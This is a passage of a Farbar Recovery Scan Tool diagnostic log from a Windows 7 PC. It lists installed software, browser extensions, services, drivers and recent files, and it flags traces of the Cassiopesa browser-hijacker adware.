Handler-x32: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files (x86)\Intuit\QuickBooks 2009\HelpAsyncPluggableProtocol.dll [2011-12-22] (Intuit, Inc.)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\windows\SysWOW64\mscoree.dll [2010-11-20] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2014-04-25] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2014-04-25] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-08-22] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: (Search Helper Extension) - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2012-08-31] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: (Default Manager) - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2012-08-31] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_31_0_0_122.dll [2018-10-13] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2014-04-25] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_31_0_0_122.dll [2018-10-13] ()
FF Plugin-x32: @InboxAce_1g.com/Plugin -> C:\Program Files (x86)\InboxAce_1g\bar\1.bin\NP1gStub.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll [2011-07-27] (Sun Microsystems, Inc.)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2014-04-25] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll [2010-04-01] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-23] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-23] (Google Inc.)
FF Plugin HKU\S-1-5-21-2869800736-2015486075-1125525389-1000: @kaneva.com/KanevaPatch -> C:\Program Files (x86)\Kaneva\npkanevapatch.dll [2015-03-24] (Kaneva, LLC.)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.cassiopessa.com/?f=1&a=csp_tight14_15_27&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCtBzztDtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StBzz0A0B0B0ByCyDtGyCyByE0AtGyD0EyDyEtGtD0B0F0CtGyCtA0FtDtDtB0Fzy0FyD0BtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzztBtB&cr=2093137412&ir=
CHR StartupUrls: Default -> "hxxp://www.cassiopessa.com/?f=7&a=csp_tight14_15_27&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCtBzztDtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StBzz0A0B0B0ByCyDtGyCyByE0AtGyD0EyDyEtGtD0B0F0CtGyCtA0FtDtDtB0Fzy0FyD0BtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzztBtB&cr=2093137412&ir=","hxxp://xfinity.comcast.net/?cid=insDate02012014","hxxp://start.toshiba.com"
CHR NewTab: Default -> Active:"chrome-extension://ajcmdlkeklfmbjffnlofgfkjcnpfckab/newtab.html"
CHR DefaultSearchURL: Default -> hxxp://www.cassiopessa.com/results.php?f=54&q={searchTerms}&a=csp_tight14_15_27&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCtBzztDtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StBzz0A0B0B0ByCyDtGyCyByE0AtGyD0EyDyEtGtD0B0F0CtGyCtA0FtDtDtB0Fzy0FyD0BtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzztBtB&cr=2093137412&ir=
CHR DefaultSearchKeyword: Default -> Cassiopesa.com
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Profile: C:\Users\1108\AppData\Local\Google\Chrome\User Data\Default [2018-10-31]
CHR Extension: (BestY NewTab) - C:\Users\1108\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajcmdlkeklfmbjffnlofgfkjcnpfckab [2015-10-24]
CHR Extension: (Connect) - C:\Users\1108\AppData\Local\Google\Chrome\User Data\Default\Extensions\eeihfhnbnfemlajfadhbpdfiipncebld [2015-05-23] [UpdateUrl: hxxp://clients2.googlee.com/service/update2/crx] <==== ATTENTION
CHR Extension: (McAfee® WebAdvisor) - C:\Users\1108\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2018-10-16]
CHR Extension: (Xfinity) - C:\Users\1108\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemjgdpngmhbimofcicjfhibkdbigdmb [2014-06-22]
CHR Extension: (Home Tab) - C:\Users\1108\AppData\Local\Google\Chrome\User Data\Default\Extensions\kofkpgiaknijknhajbhnghkodiccblkg [2016-07-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\1108\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-10-16]
CHR Extension: (Chrome Media Router) - C:\Users\1108\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-16]
CHR HKLM\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-25]
CHR HKLM\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-25]
CHR HKLM-x32\...\Chrome\Extension: [hemjgdpngmhbimofcicjfhibkdbigdmb] - C:\ProgramData\comcastModemRelease\shortcuts\chrome\xfinity.crx [2013-02-08]
CHR HKLM-x32\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [173472 2017-01-30] (SUPERAntiSpyware.com)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [188352 2017-02-22] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [178528 2014-04-25] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [603424 2014-06-12] (McAfee, Inc.)
S4 McOobeSv; C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [201304 2012-08-31] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [1041192 2014-06-18] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [219752 2014-06-20] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [189912 2014-06-20] (McAfee, Inc.)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2011-06-01] ()
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2011-12-22] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2008-08-08] (Intuit Inc.) [File not signed]
R2 Thpsrv; C:\windows\system32\ThpSrv.exe [558592 2011-04-20] (TOSHIBA Corporation) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 cfwids; C:\windows\System32\drivers\cfwids.sys [72128 2014-06-20] (McAfee, Inc.)
S3 HipShieldK; C:\windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
R3 mfeapfk; C:\windows\System32\drivers\mfeapfk.sys [181704 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\windows\System32\drivers\mfeavfk.sys [313544 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\windows\System32\drivers\mfefirek.sys [523792 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\windows\System32\drivers\mfehidk.sys [786296 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\windows\System32\DRIVERS\mfencbdc.sys [444720 2014-06-18] (McAfee, Inc.)
S3 mfencrk; C:\windows\System32\DRIVERS\mfencrk.sys [96592 2014-06-18] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)
R0 mfewfpk; C:\windows\System32\drivers\mfewfpk.sys [348552 2014-06-20] (McAfee, Inc.)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S3 ssmirrdr; C:\windows\System32\DRIVERS\ssmirrdr.sys [10112 2012-07-22] (support.com, Inc)
S1 AntiLog32; \??\C:\windows\system32\drivers\AntiLog64.sys [X]
S3 cpuz135; \??\C:\Users\1108\AppData\Local\Temp\cpuz135\cpuz135_x64.sys [X] <==== ATTENTION

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-31 17:16 - 2018-10-31 17:18 - 000035439 _____ C:\Users\1108\Downloads\FRST.txt
2018-10-31 17:16 - 2018-10-31 17:16 - 002414592 _____ (Farbar) C:\Users\1108\Downloads\FRST64.exe
2018-10-31 17:16 - 2018-10-31 17:16 - 000000000 ____D C:\FRST
2018-10-31 17:15 - 2018-10-31 17:15 - 001774592 _____ (Farbar) C:\Users\1108\Downloads\FRST.exe
2018-10-31 17:13 - 2018-10-31 17:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2018-10-31 12:45 - 2018-10-31 12:45 - 000388608 _____ (Trend Micro Inc.) C:\Users\1108\Downloads\HiJackThis (1).exe
2018-10-29 14:20 - 2018-10-29 14:20 - 000001979 _____ C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
2018-10-29 14:20 - 2018-10-29 14:20 - 000000000 ____D C:\Users\1108\AppData\Roaming\HPPSDr
2018-10-29 14:15 - 2018-10-29 14:15 - 000771580 _____ C:\windows\SysWOW64\PerfStringBackup.INI
2018-10-29 14:10 - 2018-10-29 14:10 - 011097312 _____ C:\Users\1108\Downloads\HPPSdr.exe
2018-10-29 12:35 - 2018-10-29 12:35 - 000000000 ____D C:\Users\1108\AppData\Local\Kokores
2018-10-29 12:24 - 2018-10-29 12:35 - 000000000 ____D C:\Users\1108\AppData\Local\{5FAA69F6-7B02-054E-169A-20A632F2DC3E}
2018-10-16 17:03 - 2018-10-16 17:03 - 000008559 _____ C:\Users\1108\Downloads\startuplist.txt
2018-10-16 17:02 - 2018-10-16 17:02 - 000000000 ____D C:\Users\1108\Downloads\backups
2018-10-16 16:59 - 2018-10-16 16:59 - 000388608 _____ (Trend Micro Inc.) C:\Users\1108\Downloads\HiJackThis.exe
2018-10-16 15:08 - 2018-10-16 15:08 - 000000000 ____D C:\SUPERDelete
2018-10-16 15:07 - 2018-10-16 15:07 - 000000000 ____D C:\Users\1108\AppData\Roaming\SUPERAntiSpyware.com
2018-10-16 15:06 - 2018-10-16 15:07 - 000000000 ____D C:\Program Files\SUPERAntiSpyware
2018-10-16 15:06 - 2018-10-16 15:06 - 000001819 _____ C:\Users\Public\Desktop\SUPERAntiSpyware Free Edition.lnk
2018-10-16 15:06 - 2018-10-16 15:06 - 000000000 ____D C:\ProgramData\SUPERAntiSpyware.com
2018-10-16 15:06 - 2018-10-16 15:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware
2018-10-16 15:04 - 2018-10-16 15:05 - 035801528 _____ (SUPERAntiSpyware) C:\Users\1108\Downloads\SUPERAntiSpyware.exe
2018-10-16 14:49 - 2018-10-16 14:49 - 000000519 _____ C:\Users\1108\Desktop\Gmail - Free Storage and Email from Google.website
2018-10-16 14:48 - 2018-10-16 14:48 - 000000519 _____ C:\Users\1108\AppData\Roaming\Microsoft\Windows\Start Menu\Gmail - Free Storage and Email from Google.website

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-31 17:16 - 2009-07-13 21:45 - 000025120 ____H C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-10-31 17:16 - 2009-07-13 21:45 - 000025120 ____H C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-10-31 17:13 - 2009-07-13 22:13 - 000782510 _____ C:\windows\system32\PerfStringBackup.INI
2018-10-31 17:13 - 2009-07-13 20:20 - 000000000 ____D C:\windows\inf
2018-10-31 17:07 - 2009-07-13 22:08 - 000000006 ____H C:\windows\Tasks\SA.DAT
2018-10-31 13:24 - 2016-05-23 17:24 - 000000266 _____ C:\windows\Tasks\{22305F83-689A-FD16-B604-7E25B458AD0C}.job
2018-10-31 13:22 - 2015-07-04 09:22 - 000000288 _____ C:\windows\Tasks\Tny_cassiopesa.job
2018-10-31 13:17 - 2012-08-26 10:36 - 000000000 ____D C:\Users\1108\AppData\Local\CrashDumps
2018-10-31 10:20 - 2009-07-13 20:20 - 000000000 ____D C:\windows\system32\NDF
2018-10-30 17:56 - 2015-10-19 20:26 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-10-29 14:21 - 2012-08-25 21:35 - 000000000 ____D C:\ProgramData\HP
2018-10-29 14:20 - 2012-08-25 21:35 - 000000000 ____D C:\Program Files (x86)\HP
2018-10-29 14:20 - 2012-08-25 21:30 - 000000000 ____D C:\Users\1108\AppData\Local\HP
2018-10-29 12:24 - 2015-10-19 20:26 - 000000000 ____D C:\Users\1108\AppData\Local\{1576232A-31DE-4F92-5C46-6A7A782E96E2}
2018-10-29 12:24 - 2015-07-04 16:22 - 000000534 _____ C:\Users\1108\AppData\Roaming\WB.CFG
2018-10-29 12:19 - 2012-09-01 09:13 - 000000000 ____D C:\Users\1108\AppData\Local\ElevatedDiagnostics
2018-10-28 19:06 - 2015-02-18 19:38 - 000002154 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2018-10-28 19:06 - 2012-05-11 14:15 - 000002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-10-16 16:59 - 2012-06-24 10:38 - 000000000 ____D C:\Users\1108\AppData\Local\VirtualStore
2018-10-16 16:22 - 2015-05-23 11:05 - 000000000 ____D C:\Users\1108\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kaneva
2018-10-16 16:22 - 2015-05-23 11:05 - 000000000 ____D C:\Program Files (x86)\Kaneva
2018-10-16 16:20 - 2012-10-23 21:18 - 000000000 ____D C:\Program Files (x86)\AppGraffiti
2018-10-16 16:17 - 2014-02-08 20:19 - 000000000 ____D C:\Users\1108\AppData\Local\ID Vault
2018-10-16 16:17 - 2014-02-08 20:18 - 000000000 ____D C:\Users\1108\AppData\Roaming\ID Vault
2018-10-16 16:10 - 2015-07-04 09:24 - 000000000 ____D C:\Program Files (x86)\user extensions
2018-10-16 16:10 - 2012-10-23 21:15 - 000000000 ____D C:\Program Files (x86)\Inbox Toolbar
2018-10-13 21:03 - 2018-04-18 18:03 - 000004458 _____ C:\windows\System32\Tasks\Adobe Flash Player NPAPI Notifier
2018-10-13 21:03 - 2012-08-26 10:28 - 000842240 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2018-10-13 21:03 - 2012-08-26 10:28 - 000004312 _____ C:\windows\System32\Tasks\Adobe Flash Player Updater
2018-10-13 21:03 - 2012-08-26 10:28 - 000000000 ____D C:\windows\system32\Macromed
2018-10-13 21:03 - 2011-07-27 00:11 - 000175104 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-10-13 21:03 - 2011-07-27 00:11 - 000000000 ____D C:\windows\SysWOW64\Macromed

==================== Files in the root of some directories =======

2017-11-28 19:46 - 2017-11-28 19:46 - 007649280 _____ () C:\Program Files (x86)\GUT693E.tmp
2012-08-28 19:25 - 2012-08-28 19:25 - 000008428 _____ () C:\Users\1108\AppData\Roaming\UserTile.png
2015-07-04 16:22 - 2018-10-29 12:24 - 000000534 _____ () C:\Users\1108\AppData\Roaming\WB.CFG
2018-01-14 20:24 - 2018-01-14 20:24 - 000000052 _____ () C:\Users\1108\AppData\Local\0gzi1h0gzi
2015-07-04 09:24 - 2015-07-04 09:24 - 000000064 _____ () C:\Users\1108\AppData\Local\3d4818448e8d35875d67ebbc64df2412

Files to move or delete:
====================
C:\Windows\Tasks\{22305F83-689A-FD16-B604-7E25B458AD0C}.job

Some files in TEMP:
====================
2015-03-06 08:37 - 2015-03-06 08:37 - 000000000 _____ () C:\Users\1108\AppData\Local\Temp\0vidvqxe.dll
2014-08-05 14:16 - 2014-08-05 14:16 - 000889688 _____ (Omega Partners Ltd) C:\Users\1108\AppData\Local\Temp\AGChecker.exe
2012-11-20 22:33 - 2012-11-20 22:34 - 000388560 _____ (Igor Pavlov) C:\Users\1108\AppData\Local\Temp\DefaultAssets.exe
2012-11-20 22:34 - 2012-11-20 22:34 - 000286072 _____ (Igor Pavlov) C:\Users\1108\AppData\Local\Temp\DefaultOfflineContent.exe
2012-11-20 22:34 - 2012-11-20 22:35 - 043000680 _____ (Microsoft Corporation) C:\Users\1108\AppData\Local\Temp\dotNetFx40_Client_x86_x64.exe
2018-10-16 16:12 - 2018-10-31 12:41 - 000000272 _____ () C:\Users\1108\AppData\Local\Temp\gb-installer-nsi.exe
2014-12-08 19:16 - 2014-12-08 19:16 - 000000000 _____ () C:\Users\1108\AppData\Local\Temp\gt6r-jjc.dll
2014-06-22 01:55 - 2014-06-22 01:56 - 038407104 _____ () C:\Users\1108\AppData\Local\Temp\InstallIMVU_503.0.exe
2015-07-22 17:14 - 2018-10-31 17:18 - 000000000 _____ () C:\Users\1108\AppData\Local\Temp\install_temp.exe
2012-11-20 19:32 - 2012-11-20 22:33 - 000000000 _____ () C:\Users\1108\AppData\Local\Temp\NLStubInstallerResources.dll
2006-10-27 22:28 - 2006-10-27 22:28 - 000145184 ____R (Microsoft Corporation) C:\Users\1108\AppData\Local\Temp\ose00000.exe
2012-11-20 22:35 - 2012-11-20 22:36 - 014494744 _____ (Symantec Corporation ) C:\Users\1108\AppData\Local\Temp\PCCU_Installer.exe
2015-08-07 07:13 - 2015-08-07 07:13 - 000000000 _____ () C:\Users\1108\AppData\Local\Temp\pxcbimsc.dll
2015-07-14 17:55 - 2015-07-14 17:55 - 000000000 _____ () C:\Users\1108\AppData\Local\Temp\u5qfdhbh.dll
2014-12-12 08:27 - 2014-12-12 08:27 - 000000000 _____ () C:\Users\1108\AppData\Local\Temp\xslwoyn7.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\SysWOW64\wininit.exe => File is digitally signed
C:\windows\explorer.exe => File is digitally signed
C:\windows\SysWOW64\explorer.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\SysWOW64\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\SysWOW64\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\SysWOW64\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\dnsapi.dll => File is digitally signed
C:\windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-02-01 20:23

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24.10.2018
Ran by 1108 (31-10-2018 17:18:48)
Running from C:\Users\1108\Downloads
Windows 7 Home Premium Service Pack 1 (X64) (2012-06-24 17:36:39)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

1108 (S-1-5-21-2869800736-2015486075-1125525389-1000 - Administrator - Enabled) => C:\Users\1108
Administrator (S-1-5-21-2869800736-2015486075-1125525389-500 - Administrator - Disabled)
Guest (S-1-5-21-2869800736-2015486075-1125525389-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2869800736-2015486075-1125525389-1002 - Limited - Enabled)
Randi (S-1-5-21-2869800736-2015486075-1125525389-1003 - Limited - Enabled) => C:\Users\Randi

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Disabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe Flash Player 31 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Adobe Flash Player 31 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Adobe Reader X MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.0.0 - Adobe Systems Incorporated)
Bing Bar (HKLM-x32\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 6.3.2291.0 - Microsoft Corporation)
Bing Bar Platform (HKLM-x32\...\{623B8278-8CAD-45C1-B844-58B687C07805}) (Version: 6.3.2291.0 - Microsoft Corporation) Hidden
Bing Rewards Client Installer (HKLM-x32\...\{61EDBE71-5D3E-4AB7-AD95-E53FEAF68C17}) (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Cassiopesa (HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\...\Chromium) (Version: 45.0.2441.0 - Chromium) <==== ATTENTION
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 70.0.3538.77 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Officejet 6700 Help (HKLM-x32\...\{50DA41E2-0701-43E2-A8BB-FAA0CB64B28B}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet Pro 8600 Basic Device Software (HKLM\...\{791A06E2-340F-43B0-8FAB-62D151339362}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Officejet Pro 8600 Help (HKLM-x32\...\{46235FF7-2CBE-4A84-BEDA-87348D1F7850}) (Version: 28.0.0 - Hewlett Packard)
HP Officejet Pro 8600 Product Improvement Study (HKLM\...\{2BF5E9CC-C55D-4B0F-ACAF-FFE77F333CD8}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (HKLM-x32\...\{846B5DED-DC8C-4E1A-B5B4-9F5B39A0CACE}) (Version: 1.00.0000 - Microsoft) Hidden
